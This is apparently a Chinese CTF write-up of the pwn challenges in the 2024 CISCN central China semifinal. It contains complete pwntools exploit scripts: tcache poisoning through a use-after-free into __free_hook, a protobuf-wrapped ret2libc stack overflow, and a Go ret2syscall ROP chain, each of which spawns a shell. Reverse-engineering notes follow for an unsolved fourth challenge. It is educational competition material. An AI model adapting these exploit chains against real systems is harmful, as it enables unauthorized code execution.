2024全国大学生信息安全竞赛(ciscn)半决赛(华中赛区)Pwn题解

简介

前段时间赛前准备把ciscn东北赛区、华南赛区、西南赛区半决赛的题都复现完了。

可惜遇到了华东北赛区的离谱平台和离谱pwn出题人:

  • 假的awdp(直接传🐎到靶机,然后连上去cat /flag.txt即可)
  • 题型分布不合理,8个web 2个pwn(还是没有libc的栈上签到题)

今天把华中赛区的题目也都复现了一下,题目分布为1个简单堆、1个高版本堆、1个go和1个protobuf。

对比之下,华东北的题最烂。

Pwn1-note

签到堆题,2.31版本libc(tcache利用最简单的版本)。

题目没去除符号表,经典菜单题,逆向也不复杂。

逆向分析

拖入IDA分析:

image-20240625150826971

经典的增删改查菜单,逐个分析。

add

image-20240625150911008

可以申请最多1024个任意大小的chunk(小于0x1000)。

edit

image-20240625151012613

正常编辑功能,不存在溢出。

delete

image-20240625151108465

关键漏洞点,存在UAF漏洞。

show

image-20240625151130024

正常打印输出chunk中的内容。

利用思路

题目给的glibc2.31相对来说还是比较好利用的,没有fd指针也加密,malloc也不检查是否0x10对齐。

存在UAF漏洞,没有任何限制。打法有很多种,最简单的就是tcache poisoning打__free_hook -> system。

通过tcache泄露堆地址,通过unsorted bin泄露libc,然后修改tcache的fd指针指向free_hook。

修改free_hook为system,然后释放一个带有/bin/sh的chunk即可完成利用。

exp

from pwn import *elf = ELF("./pwn")
libc = ELF("./libc.so.6")
p = process([elf.path])context(arch=elf.arch, os=elf.os)
context.log_level = 'debug'def add_chunk(size, content):p.sendlineafter(b"5. exit\n", b"1")p.sendlineafter(b"content: \n", str(size).encode())p.sendlineafter(b"content: \n", content)def edit_chunk(index, content):p.sendlineafter(b"5. exit\n", b"2")p.sendlineafter(b"index: \n", str(index).encode())p.sendlineafter(b"content: \n", str(len(content)).encode())p.sendafter(b"Content: \n", content)def delete_chunk(index):p.sendlineafter(b"5. exit\n", b"3")p.sendlineafter(b"index: \n", str(index).encode())def show_chunk(index):p.sendlineafter(b"5. exit\n", b"4")p.sendlineafter(b"index:", str(index).encode())# leak heap and libc
for i in range(9):add_chunk(0x98, b'a' * 0x98)  # 0-8for i in range(7):delete_chunk(6 - i)
delete_chunk(7)show_chunk(0)
heap_base = u64(p.recvuntil((b'\x55', b'\x56'))[-6:].ljust(8, b'\x00')) & ~0xFFF
success("heap_base = " + hex(heap_base))show_chunk(7)
libc_base = u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00')) - 0x1ecbe0
libc.address = libc_base
success("libc_base = " + hex(libc_base))# tcache poisoning
free_hook = libc.sym['__free_hook']
system = libc.sym['system']
edit_chunk(1, b'/bin/sh\x00')edit_chunk(0, p64(free_hook))
add_chunk(0x98, b'b' * 0x98)  # 9
add_chunk(0x98, p64(system))  # 10 __free_hook# gdb.attach(p)
# pause()delete_chunk(1)p.interactive()

Pwn2-protoverflow

题目很简单,ret2libc。

难点在于交互时套了一层C++ Protobuf的壳。

Protobuf-C逆向可以参考《深入二进制安全:全面解析Protobuf》文章,近期会再更新一期关于C++中Protobuf结构体还原的方法。

逆向分析

image-20240625172306036

发现程序运行时会打印puts函数地址,泄露libc。然后解析Protobuf结构体并调用真正的主函数。

结构体还原

使用pbtk工具:

pbtk-1.0.5/extractors/from_binary.py ./pwn

得到结构体:

syntax = "proto2";message protoMessage {optional string name = 1;optional string phoneNumber = 2;required bytes buffer = 3;required uint32 size = 4;
}

利用思路

image-20240625172246979

name和phoneNumber可选,没什么用。

buffer为字符串,size可自定义,调用memcpy时会存在栈溢出漏洞。

已知libc,可以考虑直接ret2libc。

(这里需要注意的是,经过编译后的Protobuf会在头部增加一个Message结构体,下标3开始才是我们的字段)

(而if里判断了下标为2的参数,这里猜测是判断结构体中name和phoneNumber字段是否为空)

exp

from pwn import *
import message_pb2elf = ELF("./pwn")
libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")
p = process([elf.path])context(arch=elf.arch, os=elf.os)
context.log_level = 'debug'# leak libc
p.recvuntil(b'Gift: ')
gift = int(p.recv(14), 16)
libc_base = gift - libc.sym['puts']
libc.address = libc_base
success("libc_base = " + hex(libc_base))# rop
system = libc.sym['system']
binsh = next(libc.search(b'/bin/sh\x00'))
ret = next(libc.search(asm('ret'), executable=True))
pop_rdi = next(libc.search(asm('pop rdi; ret'), executable=True))
pop_rsi = next(libc.search(asm('pop rsi; ret'), executable=True))
pop_rdx_r12 = next(libc.search(asm('pop rdx; pop r12; ret'), executable=True))rop = b'a' * 0x210 + b'deadbeef'
rop += p64(pop_rdi) + p64(binsh)
rop += p64(pop_rsi) + p64(0) + p64(pop_rdx_r12) + p64(0) * 2
rop += p64(system)# gdb.attach(p, 'b *$rebase(0x3345)\nc')
# pause()message = message_pb2.protoMessage()
message.buffer = rop
message.size = len(rop)p.send(message.SerializeToString())p.interactive()

Pwn3-go_note

Go语言静态编译的题目,IDA反编译不是很好,但是代码不复杂且漏洞点很好发现。

关键问题是没有libc,需要找一些ROP来调用静态编译的函数,方法可能不是最优解,但是很容易想到。

逆向分析

Go语言逆向,相比于C语言的区别如下:

  • main函数名为main_main(如果去除符号表,考虑通过bindiff还原)

  • 参数依次通过寄存器传递:AX、BX、CX、DI、SI、R8、R9、R10、R11

对于Go语言逆向,IDA支持不是很好,我们需要结合汇编代码和动态调试来分析。

找到main_main函数:

image-20240625174510916

好在不是很复杂,根据菜单发现有add、delete、edit和show功能,依次分析。

add

image-20240625180057909

存在一个Notes结构体,存储len和array结构体数组。add函数会将id、content_len和content加入到array结构体数组中。

delete

image-20240625180225045

直接看变量有点复杂,结合gdb调试发现不存在UAF漏洞。

edit

image-20240625202417201

直接看变量有点复杂,结合gdb动态调试发现这里没有判断输入长度,存在溢出漏洞并能覆盖到返回地址。

show

image-20240625202429139

看上去没有什么漏洞,直接打印内容。

利用思路

结合动态调试,发现edit存在栈溢出漏洞,可以劫持程序的控制流程。

由于题目没有给出libc,也没办法泄露相关地址,我直接采用了ret2syscall。

题目是静态编译,搜索下syscall发现有如下函数:

image-20240625202533683

我们的目的是执行execve(“/bin/sh”, 0, 0)。rax寄存器为系统调用号,rbx、rcx、rdi是系统调用的三个参数。

然后通过ROPgadget找到gadget:

rw_mem = 0x527088
pop_rax_rbp = 0x0000000000404408    				# pop rax, rbp; ret
pop_rbx = 0x0000000000404541        				# pop rbx; ret
mov_rcx_0 = 0x000000000040318f      				# mov rcx, 0; ret
xor_edi_add_rsp_10_pop_rbp = 0x0000000000411aee  	# xor edi, edi; add rsp 0x10; pop rbp; ret
syscall = 0x403160

找不到pop rcx和pop rdi指令,由于rcx和rdi都应该置0,所以可以找mov或者xor指令替代。

经过一番查找,发现一条mov rcx, 0指令可以把rcx寄存器置0。

并且,有一条xor edi, edi; add rsp, 0x10; pop rbp;指令,只要能够让edi置0即可,后面的指令相当于弹出栈上3个参数,填充即可。

现在距离拿下shell只差一步,题目没有/bin/sh字符串,需要我们想办法写入一个已知地址。

经过调试发现,add函数将内容写在了堆上,我们可以考虑利用一些gadget将字符串写到bss段上。

比如,可以通过下面的gadget:

# use to write /bin/sh
# ...                               # pop rax, rbp; ret
pop_rdx = 0x000000000047a8fa        # pop rdx; ret
mov_meax_edx = 0x0000000000402fd1   # mov [eax], edx
# write /bin to rw_mem
payload += p64(pop_rax_rbp) + p64(rw_mem) + p64(0)
payload += p64(pop_rdx) + b'/bin' + b'\x00' * 4
payload += p64(mov_meax_edx)
# write /sh to rw_mem
payload += p64(pop_rax_rbp) + p64(rw_mem + 4) + p64(0)
payload += p64(pop_rdx) + b'/sh' + b'\x00' * 5
payload += p64(mov_meax_edx)

然后正常的覆盖返回地址到rop gadget执行ret2syscall即可。

exp

from pwn import *elf = ELF("./note")
p = process([elf.path])context(arch=elf.arch, os=elf.os)
context.log_level = 'debug'# rop
rw_mem = 0x527088
pop_rax_rbp = 0x0000000000404408    # pop rax, rbp; ret
pop_rbx = 0x0000000000404541        # pop rbx; ret
mov_rcx_0 = 0x000000000040318f      # mov rcx, 0; ret
xor_edi_add_rsp_10_pop_rbp = 0x0000000000411aee  # xor edi, edi; add rsp 0x10; pop rbp; ret
syscall = 0x403160# use to write /bin/sh
# ...                               # pop rax, rbp; ret
pop_rdx = 0x000000000047a8fa        # pop rdx; ret
mov_meax_edx = 0x0000000000402fd1   # mov [eax], edxpayload = b'a' * 0x38 + b'deadbeef'
# write /bin to rw_mem
payload += p64(pop_rax_rbp) + p64(rw_mem) + p64(0)
payload += p64(pop_rdx) + b'/bin' + b'\x00' * 4
payload += p64(mov_meax_edx)
# write /sh to rw_mem
payload += p64(pop_rax_rbp) + p64(rw_mem + 4) + p64(0)
payload += p64(pop_rdx) + b'/sh' + b'\x00' * 5
payload += p64(mov_meax_edx)
# syscall 0x3b
payload += p64(pop_rax_rbp) + p64(0x3b) + p64(0)
payload += p64(pop_rbx) + p64(rw_mem)
payload += p64(mov_rcx_0)
payload += p64(xor_edi_add_rsp_10_pop_rbp) + p64(0) * 3
payload += p64(syscall)p.sendline(b'1')
p.sendline(b'a')
p.sendline(b'3')
p.sendline(b'1')# gdb.attach(p, 'b *0x47F41E\nc')
# pause()p.sendline(payload)p.interactive()

Pwn4-starlink

逆向起来比较费劲,涉及到了SSE指令,IDA反编译的有问题,并且结构体设置的比较复杂。

除了final和destroy函数都逆了下,但是没有找到漏洞点,有兴趣的师傅可以做一下。(听武汉大学的secsome师傅和V3rdant师傅说是start结构体的0x00偏移量位置的计数器没有+1,这里确实是一个漏洞点,但是不知道后续怎么利用。)

(secsome师傅说IDA把一堆32bytes的识别成xmm导致反编译的有问题)

这里给出一部分逆向分析过程。

逆向分析

查看main函数,发现是经典菜单题,选项多了点,逐个分析。

add_star

image-20240625204450338

最多申请0x100个chunk。输入idx、size和content,申请0x60大小的chunk_a后申请指定size的chunk_b。

与常规题目不同的是:

if ( ptr )
{__printf_chk(1LL, "Data: ");read(0, ptr, size);*(_QWORD *)&vars0 = 1LL;vars40 = &vars30.m128i_i64[1];*((_QWORD *)&vars0 + 1) = idx;vars10 = 0uLL;*(_QWORD *)&buf = 0LL;*((_QWORD *)&buf + 1) = size;vars48 = 0LL;vars30 = _mm_unpacklo_epi64((__m128i)(unsigned __int64)ptr, (__m128i)(unsigned __int64)&vars30.m128i_u64[1]);*((_QWORD *)heap_array + idx) = &vars0;return puts("Star created!");
}

这段代码很奇怪,反编译有问题。

前面将申请的0x60大小chunk_a的用户区域指针赋值给了rbp,chunk_b的用户区域指针赋值给了r12。

这里read内容到chunk_b后执行了一系列命令,可以看下汇编:

image-20240625211818758

执行如下操作:

  • [chunk_a] = 1
  • [chunk_a + 8] = idx
  • [rbp + 0x40] = &chunk_a + 0x38
  • [rbp + 0x28] = size

而对于punpcklqdq xmm0, xmm1指令,动态调试发现:

image-20240625214505777

执行结果,xmm0为16字节。低8字节为&chunk_b,高8字节为&chunk_a + 0x38。

然后执行如下操作:

  • [chunk_a + 0x30] = xmm0,即[rbp + 0x30] = &chunk_b,[rbp + 0x38] = &chunk_a + 0x38。
  • heap_array[idx] = &chunk_a。

动态调试后结构如下所示:

image-20240625214936911

add_link

image-20240626075505510

输入chunk_a和chunk_b的下标,然后输入distance,会判断chunk+0x20的位置是否有数据,若不为0则代表已经finalize。

然后判断chunk+0x10的位置是不是小于0x100,猜测这里是代表当前结点的连接数量。

后面的部分看汇编代码:

image-20240626075824877

申请0x30大小的chunk作为link结构体。它执行如下操作:

  • rcx = [chunk_a + 0x38]
  • xmm0 = &chunk_b
  • rdx = &link_chunk + 0x10
  • [link_chunk] = distance
  • r12 = r12 + 1
  • rsi = &chunk_a + 0x38
  • edi = 0x20
  • xmm3 = [chunk_a + 0x38]
  • [link_chunk + 0x18] = &chunk_a + 0x38
  • punpcklqdq xmm0, xmm3,结果是xmm0的低8字节为&chunk_b,高8字节为[chunk_a + 0x38]。
  • [link_chunk + 0x8] = &chunk_b,[link_chunk + 0x10] = [chunk_a + 0x38]
  • [[chunk_a + 0x38] + 8] = &link_chunk + 0x10
  • [chunk_a + 0x38] = &link_chunk + 0x10
  • [chunk_a + 0x10] = [chunk_a + 0x10] + 1

动态调试结果如下:

image-20240626082623399

然后再次调用malloc申请一个0x30大小的chunk,执行如下操作:

  • rcx = [chunk_b + 0x38]
  • xmm0 = &chunk_a
  • rdx = &chunk_link + 0x10
  • [chunk_link] = distance
  • rsi = &chunk_b + 0x38
  • xmm4 = [chunk_b + 0x38]
  • [chunk_link + 0x18] = &chunk_b + 0x38
  • punpcklqdq xmm0, xmm3,结果是xmm0的低8字节为&chunk_a,高8字节为[chunk_b + 0x38]。
  • [chunk_link + 0x8] = &chunk_a,[chunk_link + 0x10] = [chunk_b + 0x38]
  • [[chunk_b + 0x38] + 8] = &chunk_link + 0x10
  • [chunk_b + 0x38] = &chunk_link + 0x10
  • [chunk_b + 0x10] = [chunk_b + 0x10] + 1

动态调试结果如下:

image-20240626084125058

view_start

image-20240626084451663

根据输入的idx输出对应的Index、Data、LinkCount和Distance。

可以结合这个show函数还原部分结构:

image-20240626090836643

大概可以知道,start存储了Index、data_len、data_ptr和Link_count,并且和这个start相关的link组成了一个双向链表。

对于每个start的link,存储distance、star_ptr、fd和bk,类似于链表实现邻接矩阵。

update_star

image-20240626091238961

根据update函数,又能推断出一些信息:field_20和finalize有关。

然后可以正常edit数据区域,不存在溢出漏洞。

push_star

image-20240626092930490

将field_0的值减1,如果field_0为0则进入清理操作。

将所有link删除,然后将star删除。

final

image-20240626095122784

final函数用于构建graph。

后面实在不想分析了,看了会也没找到漏洞在哪。

题目附件

关注公众号【Real返璞归真】回复【ciscn】下载题目附件。

image-20240626105345009

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/diannao/35557.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

当前的网安行业绝对不是高薪行业

昨天,面试了一个刚毕业两年的同学小A。第一学历为某大专,第二学历为某省地区的本科院校。面试过程表现一般偏下,但动不动就要薪资15K 这个人,我当场就PASS了。主要原因是,并非是否定小A同学的能力,而是他…

VSCode运行前端项目-页面404

背景: 通过VSCode运行前端本地项目,运行成功后打开本地链接:http://1x.xxx.x.xxx:9803/ ,发现打开的页面重定向到404:http//1xx.xxx.x.xxx:9803/404; 并且控制台出现:Failed to load resource: …

win10修改远程桌面端口,Windows 10下修改远程桌面端口及服务器关闭445端口的操作指南

Windows 10下修改远程桌面端口及服务器关闭445端口的操作指南 一、修改Windows 10远程桌面端口 在Windows 10系统中,远程桌面连接默认使用3389端口。为了安全起见,建议修改此端口以减少潜在的安全风险。以下是修改远程桌面端口的步骤: 1. 打…

IMX6ULL SD卡启动uboot+kernel+rootfs

目录 1. 背景说明 2.SD卡启动 2.1准备条件 2.2 对SD卡分区格式化 2.3 制作sd卡镜像 3.效果测试 1. 背景说明 网络上绝大数教程,教大家把uboot烧录到SD卡,然后uboot启动后,通过TFTP下载kernel和设备树,然后通过nfs挂载文件系…

ultralytics官方更新 | 添加YOLOv10到ultralytics

💡💡💡本专栏所有程序均经过测试,可成功执行💡💡💡 专栏目录:《YOLOv8改进有效涨点》专栏介绍 & 专栏目录 | 目前已有40篇内容,内含各种Head检测头、损失函数Loss、…

【C++】类和对象(六)

文章目录 二、static成员概念面试题一个题目 三、友元友元函数说明 友元类 四、内部类(了解)概念:注意:特性: 五、匿名对象 书接上回: 【C】类和对象(五)隐式类型转换 二、static成员 01_31 03 12 01 概…

idea项目推送gitee/github

选择需要的项目创建本地Git仓库 添加到暂存区 第一次提交 或者点击这里 写备注并commit 推送远程仓库 填写地址 解决上图警告 右键打开项目,输入 git pull origin master –allow-unrelated-historiesgit push -u origin master -f推送成功 idea项目推送github及克…

怎么用韩语说帮忙更合体,柯桥零基础韩语培训

1. **详细解释:** - **标准写法与音译:** - **돕다**(读作 dop-da):动词“帮助”。 - **도와주다**(读作 do-wa-ju-da):动词“帮忙”,字面意思是“给予帮助”。 - **도움…

PMP证书在国内已经泛滥了,大家怎么看?

目前,越来越多的人获得了PMP证书。自1999年PMP引入中国以来,全国累计PMP考试人数接近60万人次,通过PMP认证的人数约为42万人。虽然这个数据看起来很大,但绝对不能说是过多。 首先,PMP在中国并不普遍。根据美国项目管理…

【源码+文档+调试讲解】灾害应急救援平台

摘 要 灾害应急救援平台的目的是让使用者可以更方便的将人、设备和场景更立体的连接在一起。能让用户以更科幻的方式使用产品,体验高科技时代带给人们的方便,同时也能让用户体会到与以往常规产品不同的体验风格。 与安卓,iOS相比较起来&…

深度学习项目实例(一)—— 实时AI换脸项目

一、前言 人工智能(AI)技术的快速发展为各个领域带来了革命性的变化,其中之一就是人脸识别与图像处理技术。在这之中,AI换脸技术尤其引人注目。这种技术不仅在娱乐行业中得到广泛应用,如电影制作、视频特效等&#xf…

目前公认最好用充电宝!四款高性价比充电宝推荐,一文看懂!

当我们在旅行途中,手机和相机等设备必不可少。长时间使用这些设备,电量很容易耗尽。此时,充电宝就能派上用场,让我们在欣赏美景、记录美好时光的同时,不再担心电量不足。特别在假期出游的时候在我们玩的特别尽兴的时候…

【C++】关于虚函数的理解

深入探索C虚函数:原理、应用与实例分析 一、虚函数的原理二、虚函数的应用三、代码实例分析四、总结 在C面向对象编程的世界里,虚函数(Virtual Function)扮演着至关重要的角色。它不仅实现了多态性这一核心特性,还使得…

红酒与珠宝:璀璨与醇香的奢华交响,双重诱惑难挡

在璀璨的灯光下,红酒与珠宝各自闪耀着迷人的光芒,它们如同夜空中的繁星,交相辉映,共同演绎着奢华的双重诱惑。今天,就让我们一起走进这个充满魅力的世界,感受红酒与珠宝带来的无尽魅力。 首先,让…

基于STM32+ESP8266打造智能家居温湿度监控系统(附源码接线图)

摘要: 本文将介绍如何使用STM32单片机、ESP8266 Wi-Fi模块和Python Flask框架构建一个完整的物联网系统,实现传感器数据采集、无线传输、云端存储及Web可视化展示。 关键词: STM32, ESP8266, 传感器, Flask, 物联网, 云平台, 数据可视化 1. 系统概述 本系统以STM…

Spring底层原理之proxyBeanMenthod实例 动态代理 反射 Bean的拦截

proxyBeanMenthod 假设我们要进行一个系统的二次开发 然后第一次开发我们实用的是XML声明bean 二次开发的时候要用注解 我们如何把bean都加载上来呢 我们首先创建一个全新的配置类 package com.bigdata1421.config;public class SpringConfig32 { } 我们创建一个APP 加载…

全球最快的 JSON 文件查询工具

本文字数:1684;估计阅读时间:5分钟 审校:庄晓东(魏庄) 本文在公众号【ClickHouseInc】首发 介绍 在 ClickHouse,我们热衷于基准测试和性能优化。所以当我第一次看到 Hacker News 上那篇“查询大…

代码随想录算法训练营day31|134.加油站、135. 分发糖果、406.根据身高重建队列

134.加油站 如下图所示&#xff1a; 当索引一道2的时候&#xff0c;剩余油量的总量13-6 < 0&#xff0c;这个时候说明以索引0为起点不合适&#xff0c;将起点更新为索引3. 两点证明&#xff1a; 1.如果我们从蓝色段中间选一个点开始&#xff0c;是不是最后sumGas就不小于0…

从灵感到成品:使用AI生成博客文章的完整指南

在信息爆炸的时代&#xff0c;每个人都有讲述自己故事的权利和需求。博客作为一种表达方式&#xff0c;不仅能记录个人经历&#xff0c;还能分享知识和观点。然而&#xff0c;许多人在写博客文章时&#xff0c;常常会遇到灵感枯竭、时间不够用或者不知道如何开始等问题。幸运的…

光伏储能系统/安科瑞DTSD1352-CF双向计量表-安科瑞 蒋静

1 长期以来&#xff0c;我国施行居民用电低价政策&#xff0c;居民电价大幅低于供电成本&#xff0c;虽然实施了全天分三时段的阶梯电价政策&#xff0c;但过去近10年中高峰节电的效果却不够明显。从分时用电运作机制来看&#xff0c;居民用电价格的波动幅度不大&#xff0c;但…